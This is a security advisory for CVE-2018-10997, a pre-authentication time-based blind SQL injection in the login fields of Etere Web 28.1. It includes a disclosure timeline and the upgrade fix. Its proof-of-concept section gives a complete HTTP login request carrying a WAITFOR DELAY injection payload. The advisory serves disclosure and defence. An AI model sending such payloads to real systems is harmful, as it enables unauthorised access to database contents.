Technicolor Security Office - Vulnerability Advisory | |
####################################################################### | |
#Title: Time-Based Blind SQL-Injection | |
#Product: Etere Web | |
#Homepage: https://www.etere.com/DocView/1009/ETEREWEB.aspx | |
#Vulnerable versions: Etere Web 28.1 | |
#CVE: CVE-2018-10997 | |
#Impact: critical | |
#Discoverer: Dion Bellemare | |
####################################################################### | |
----------------------------------------------------------------------- | |
[Description] | |
EtereWeb 28.1 has a pre-authentication blind SQL injection in the POST parameters txUserName and txPassword. | |
----------------------------------------------------------------------- | |
[Vendor of Product] | |
Etere Pte Ltd | |
----------------------------------------------------------------------- | |
[Affected Product Code Base] | |
EtereWeb - 28.1 | |
----------------------------------------------------------------------- | |
[Attack Type] | |
Remote | |
----------------------------------------------------------------------- | |
[Impact Information Disclosure] | |
true | |
----------------------------------------------------------------------- | |
[CVE Impact Other] | |
An attacker can exploit this vulnerability to disclose sensitive database (MSSQL DBMS) information and contents. In some installation scenarios it may be possible to compromise the remote system and take full control. | |
----------------------------------------------------------------------- | |
[Has vendor confirmed or acknowledged the vulnerability?] | |
true | |
----------------------------------------------------------------------- | |
[Proof Of Concept] | |
Target: http://etere.example.com/etereweb/ | |
Target Parameters: txUserName (POST) | |
Target Parameters: txPassword (POST) | |
POST /etereweb/ HTTP/1.1 | |
Host: etere.example.com | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate | |
Referer: http://etere.example.com/etereweb/ | |
Cookie: ASP.NET_SessionId=0ep1w51ja4yezeubp2m15vo0 | |
Connection: close | |
Upgrade-Insecure-Requests: 1 | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 750 | |
txUserName=' WAITFOR DELAY '0:0:5'--&txPassword='&btnAccedi=Login&hdIdUser= | |
----------------------------------------------------------------------- | |
[Solution] | |
Upgrade EtereWeb to version 28.1.20 or greater | |
----------------------------------------------------------------------- | |
[Advisory History] | |
2018-05-02 - Initial discovery and write-up of vuln advisory | |
2018-05-02 - Sent notification email to Etere contact | |
2018-05-03 - Received initial response from Etere | |
2018-05-08 - Sent email to suggest using PGP to encrypt email | |
2018-05-29 - Additional details of vuln provided to Etere | |
2018-05-31 - Etere responds that vuln is fixed in version 28.1.20 | |
----------------------------------------------------------------------- | |
[Discoverer] | |
Dion Bellemare |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment